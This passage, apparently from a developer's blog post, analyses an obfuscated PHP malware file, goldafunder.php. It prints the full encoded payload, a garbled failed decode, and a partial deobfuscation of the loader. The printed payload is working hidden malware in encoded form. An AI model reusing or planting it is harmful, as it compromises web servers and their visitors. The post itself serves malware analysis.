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")));$HTIRyzRYNNT();?>
Enter fullscreen mode Exit fullscreen mode

Now, to me, that last line looks like it contains some base64 string.

Upon decoding the last large base64 string ("K0...QC"), I got a binary (maybe).

+D+H7E�+L�Q����ԑ�����U�&��@��՘��^�ٜ��]�Տ�
ؓ�ԑ��
ܧ�&�+L��ۗU�+D&H6�ݦ�텝�����T&��T&��@��՘��^�ٜ��]�Տ�
ؓ�ԑ��
ܧ�&D+L��ۗU�&H6�ʅQɲH���ɡA��ٛ�����˘����ɘ����Q����������@��QɡA��ٛ�����˘��Iɋ����ۡ����������Y��������D��Y����ݘ�Q��]݄�ˋD��Y����� ���ޖщ�A��ٛ�����˘��ś����՘��������Ø��؛�U����Ȏ�ݠ���]�}]������Տ�ə�]��]�}]������щ�������ڲT&H6�ʧIH�ݛ��ڊ�[��������ܦ��U�&H6�ȥM�����U�&��T+H6�+D&D+L�Q����ԑ�����U�&D+H7E�&D+L�
ܔ�ɰ
ٔ�ɰ�ںQ���ԑ��ٝY�}]��וٛ�������&D&��IH��\������������ٛ��&D&H6���
ܔ���̜�Ԋ�\�OsQ���ˣ̉�
ٔ��&D&H6��D��Y����Y���������Yؒ���ՙ��Y�Q�}]��Q��X�ԑ�&D&H6�׈M��ٛ��oٙ�Q���ںQ��D&D+L�D��Y���ɧ؏p]�s�����
O���pQ�s܉�M����&D&H6�ʤ���ڽޕȱ
ؒ�����ܠ��T&H6��@��՘��^�ٜ��]�Տ�
ؓ�ԑ��
ܧ�&D+H6�����T&��T&H6�ݦ��A����Q����ՙ&D&H6��T&D+D&D&D+L�A����Q����Q����������R:Q}Q$�S%X��M���������A����Q��D&D&H6�ʯ�����@ȥ��Q��ٛ����ϕ�����U��ٙ&D&D+D+L�A����Q����   ���ޖщ�E��Ȱ��������M�������ܰ������U٭X��M���������A����Q��D&D&��D��Q��U�������U٬՝���   ���ޖݘ�X��M���������A����Q��D&D&��D��Q��U����՚���ݜ������՚���ݜ�����Q��Y�|���T��Q��U���&D&H6�ʕذەɱA��Q����A��Q�����՘����\��ϕذە�&D&D+L�A����Q�����Q����ޕɊ��Q��Y�|���T��Q��U���&D&H6�����T&D+D&D&D+L�A����Q�����Y����U����Q��Y�|���T��Q��U���&D&D+L����Ƀ�ςɜ�Q���؃IH˙�oٙ�Q��
��Y����&D&H6�ʦD���ۊ�[�������܇�\���D�t�����������]��Q����T&D+L��ۗU�&D+L�Q���ݹQ��ݘ�ݛ�����T&D+L�ޕɡA��ՙ��M�M����ӕ�ӝ���۽�&D&H6�ʧIH����Q��Q�̜�������]��Q����&D&�+L�D���۽����������]��Q����&D+H7E��@���ɠ�ِU��X��DȰY�����ʰY���������������Q��Q��ɢ
��Y�����A��ݹQ��ݘ���H�A����U��Q����D��A��ݹQ��ݘ��[������ݘ��ф��Y�T��Q�ӕ�ӝ����D��A��ݹQ��ݘ��[��������ܦ��U�&H6�ȥ
ۉ����&H6�׈�ںQ�}Q���ۤ���������ںQ�}Q���ۥ��    ���ޖщ����ݝ�Uϐ���U٬՝��׋���ܤ���Q���[�����՚���ݜ���IH����oٙ�Q�Tٱ���t���Q���[��������t���Y���[������؉�t���Q�Yoٙ�Q�\ڌQ�Q  �IH����U٬��������   ���ޖщ&H6�ʥ�������Q�}͔�؊��Q��Y�����\ۛ����ʙ���۰ٙ�ʥ����ݕٙ�����������������U�͑��H�Ȑ��������ٙXْ�ʧ��Q���ӕ�ӝ���]�ݗ���
���Q�}͔�؈�ذە�&H6�̯A^�U͓Q�m���Hٛщ&H6���
ۉ��E�����M��Q���������Q��Y���ː��U��ݖY���܀�����ݛ�џ�њ�Q��٘�ْQ��ٲY��U�٘���ݑ��ܗ���Q��Q��Q���ݑ�
���ܗ���شM��ٱݛ�݈����ط�Y��ܠ��T+L�D������������M�����ћ䕘�ۼًqY��՞����ۼًr��U�̕��U��]�����ݝ�ٻ���Q��Q��ۼًq����џ�њ�Qߠٜ�]��Q��Y��ۇۼًs��ۼًrݜ�ۼًs���ۼًqٛ������ݙ����ѝ�]��Y����U�&��IHI�QS��Hl�QX�QO�IPܦUے�׈�QIY�WAU ��IYI]}������t��9]�T�U|URl�QX�QO�IT����D����@ݼ��&H6�ʧA^�U͓Q�m�������ܤ
���&�&��X6�ʦL��Y��ݘ��ӕ�ӝ���]�ݗ���
���Q�}͔�؈
��ڰU��]��Q�����D+L�L��Y��ݘ������]����
���&��@��Y��U��щ&�+L��ۗY�6�+D&�+L�Q��T+H6�ʥݽ���ڰU��]��A��ٛ��M�M�������T+L�D&D+@���@��U�������Q�������ەɡA�����Q��@ȝI���ח���Y�Q��U��Ԃ&D&H7����ȥ  ����]������@�������\���������Y�Y�|���D&D&���٥���щ��ρę�Y��Y��ݘ�D&D&���W�W��ρę�Y��D&D&���QX�QO�I��ρȜ��ܔ��&D&D+@�щ��ρș�Ԃ&D&H6���܇P��щ&H6��T+L�D��՚������ەۼݗ�]�}Q�����A��ՙ��M�M�����I������ϕ�Xٍ�&H6�ʤ�٥���щ����Q���Y�Y���U�&��@��Y��U��щ&H6�ʉH��@ޒ���U�+D&����]�����̈]K��̈���ՙ&H6�ʉ��@ޒ���U�+H6��X6�ݦ�&H6�ȻH���PU�̈���ՙ&H6��Ņ����ەɠ�ݹQ��ݘ}���Y�Y��ʉ������]��U�����ȸ�ݒ���ݗ�՘��^��݌�ɰH�ԑ��
ܧ�&��D��Yؓ�����ەۼݗ�Q�}Q�����H��ڸ�ۼ՚�ٴ���Qɡٟ�Y�Q�~Q��]�T���Ņ�����ڲT+L�H�ԑ���٥���щ��ݹQ��ݘ}���Y�Y��ʉɛÔ�����Y���ݒ���ݗ�՘��^��݌�ɰH�ԑ��
ܧ�&�쌋����њ�������ٜU��؈����]����̋�����ݒD+L����̈MQ%��PQA]H�Ȉ����U�&��X�Ȅ��ɠ��X6��T�����Pٵ��ɡ������@�������+H6�ʦH�����Y�}ٞ��ݘ��ф��Y���U�������ɠ���숈��+H6�ʋD�E�����Q��\]���X���ݘ��ф��Y�����]���6�+L�ē������ڶQ�~YܿU��Њ�]�~Y��6�숙�ً���U����
݋���Q��Q��@��U���6�Ȝڸ�ۼ՚�ٴ�����������+L���щ���ܵ���٥���щ+H6��@��Q��Q����������������������6���숋�@��Q��Q��H6�������@�����X��]�Տ������+L�D��Y��������������Q���Y�Y��P����+H6�ȟ���Dګ՛������щ+H6�ȼ����ۡPٵ�����D͓Q���+H6���ݒ��U���������Qɹ
ܾ��   ����
ܾ��@ٷP��њ�����@��њ�������ܐ��՘����\�����ۡ�6�׊IW�UMUEY��T�T�W���ݒ��D��
T>AU ��IYI]}�����ћ�������ۡ�6�수�٘Q��D̔݌�D�������������E��������Pٵ�6��H��ՙ�ݗ������Y�}ٟPޒ�숈� ەۼщ+H6�+H7I�6�숋���Qݔ��+H6�ܥ��Q����Qݔ�ȦH����Q�������Y���\�����Q�|����Q�|�ڠ��X6�ʠ�ړ�\�Q�}ٟ�\��������Q��H6��L������������ȋ������Y���\���U�+H6���Q�}۔���щ��ڑ]���&��H������Qݔ�ȦH����A��Q����|�ځ���H�����ړ�\�����Q����������{܉�
��U�}ՙ�Ƞ�����ړ�]�Y��]ؒ����Y��@��Q���������+L�ȋ�����ۃ@��Q�}۔���щ&�+L�����Qݔ�Ȧ@�������Y���\�������Q�|�ڠ������Q�̕ړ�]�UؙQ�����՘��ۚX6��D�+L    �����Н�Q��ݘ�
ݞD+@���Ԃ&��̜�]�����ڽM��Yۥ�̝��Q��Ԙ���Ԃ&��ę�U�����Л�ڼ�ۏܜ�Y���ا�&H7��]��U���ݖY��E��U�]��ܜӕ��ќ�ݘ����Y���ںU��]�&H7��U��ɛ��K�U��]��ܜ�]����    ەۼՋ���&H7�ϕ��Q��ԙ�U��Q���ڼ�ّQۏ���
ݞD+@�  ەۼ��Q����]���ّQۏ���
ݞD+@
�Y��Q����Q�}��Y���&�+D&��@��Q�|ە��]�|�����Qݔ��&��T����ܐ�O�B����Y���ʁ��&�+L����Q�|��}ٜ��Q������+D+H6���щ������Y��Q�����Y�&��X6�ʋ   ��ޗ����۾Q��ݛ0���Q��Q�&H6�ʈ��� ��ޗ�����X7E�+L������A���ӕ�ӝ����Q��Q�&H6�ʈ���
ؒ���U�+H6��D��@������Q��@ٶ������ˈ�bUPKX�P��������U��ɠ��X6�ʈ���Q�������Q�L���Q��Q�����L�����ʁ��&��MI����\�ڞ�[���}ٟ�Y�Q�~Q��]ؐ�Q݅ܒH6�ן   ���]�Y����ܖ�����]�ݗ�՘��^��ݍ��   ��ޗ��&��MI����]�Q��ݘ��[���}ٟ�Y�Q�~Q��]ؐ�щ&�+L� �ԝؒ���ݗ�՘��^��ݏTʽ����]�ݗ�՘��^��ݍ��Yؒ���Q�&��MI$�U}TUT�Il�QX�QO�I���
T>AU!ܖIYI]}������ܓ@��Y܍�+L�̋������ȟ̋����ڜ��E����DςL������MI3�=SHWIYI]��T�T�W�
�ќ����\��ٜ��+D&��T��������Q�~Q޼��}ٜ��Q������+D+L�ə�]��]�}]������щ��������Y��Q�����Y�&��@�����۰ݗ��ݎX6��@�������ٟ�[�]��ə�]��]�}]������щ&��@����ř�]���݌��������+L�  ە՘�]����   S�I]W�UC�I]P������ܽ���[�]�&��@����O�e�IYO�UC�I]P������ܽ���[�]�&��@���Qe�IYO�UC�I]P������ܽ���[�]�&��@��̃��W�6Q}T?T��
�������]���Ղ+L�@Ȱ�Q�S�U8�UQY}T?T��
�������]���Ղ+L�  ���0�U}T?T��
�������]���Ղ+L����Y���[�]؃@Ƞщ&��X������;I����L�Ĉ��L�ǀ��ͽE������ݘ���՚��3Q"�
��̹���������Y���рނ��ۅ�\�À����8��љ�]�����Lˇ����4��ӕ��Y���ݓ���Qɡٟ�Y�Q�~Q��]؃���عY�+H6�+H7I�6�ٜQ����Qݔ��+@���+@���+D&��D����Q������ɻH���ӕ��Q������H���؏rQټ��s׽���՘����Y��܃@ȕ՘��&�숏�Џ������U������������&��L���������s�܋ȡA����Q����ӕ��Q����������H6���ψ��   ۗU��Q���������+L�Ϥ�ںQ�����]ێ��U�+D��������6������՘���ɛ������������̋���L�����    ۗU��Q��A��U�}ՙ�ȸ�����՘����Y��܃@ȕ՘��&��L�ӕ��Q���ѕ�����Y��Q�����U����D+L��ںQ�����Q���^��܄��ɛ��&H6�Ȧ̊���A���ȥ����������ٙ��������6��D��ۗU��Q��   ��ݘ�L������ӕ��ъ�U��A�&�+H7E�+L��ݹU������Uڹ]��Y��Q���ӕ��Q���&��M\���m��������ӕ��Q���&�����������M��Ƀ���ɣ���Z�ط�Y��ܠ��X6�ʢE�ȕ؃@��ۗU��Q�&�+L������Y���������M��ɢٝY�}]��וٛ������عY�+H7I�6�ؐ��Qݔ��+L����EJ�A�����ݽ���ˋ�TQR��Z���vP����Q��]�Б�Ϙ�|URnQ�����ڢ�׈ؐ�����IH�A���Z�����ܧTؒH6��IYI]}�]?�}�P�QTUQK�I�M��U�~U�ȕ�TڒH6���A�����]�ш�՚�ٛՙ�6��@��ڶQ�}U����]�+H4��&�+D+D*���
Enter fullscreen mode Exit fullscreen mode

I must now attempt to deobfuscate goldafunder.php to bring meaning to the base64 encoded text.

After transforming the original php file into a somewhat javascript:

var randomText="3K4hbIR80HU_5VL1MzAqr6GgewJPjOsC9f7uFYnixvSydaNTkDX2ctlZpomQWEB"; var firstText=randomText[4] +randomText[45]+  randomText[30]+  randomText[24]+ randomText[21]  +randomText[2] +randomText[11] +randomText[44] +randomText[24]+  
randomText[52]+  randomText[57] +randomText[44]+randomText[24]; var secondText=randomText[30]+ randomText[53]+ randomText[20] +randomText[20]+ randomText[24]  +randomText[41]; var thirdText=randomText[24]+  
randomText[20] +randomText[20] + randomText[57]+  
randomText[20]+ randomText[11]+randomText[20]+randomText[24]+  randomText[56]  +randomText[57] +randomText[20]+ randomText[53]  +randomText[39]  +randomText[38]+ randomText[23]; var fourthText=randomText[52] +randomText[20]+  
randomText[24] +randomText[45] + randomText[53] +randomText[24]  +randomText[11]+  randomText[33] +randomText[35] + randomText[38]+  randomText[52]+ randomText[53]+randomText[39] +randomText[57]+randomText[38];thirdText(0); var fifthText=fourthText("",firstText(secondText("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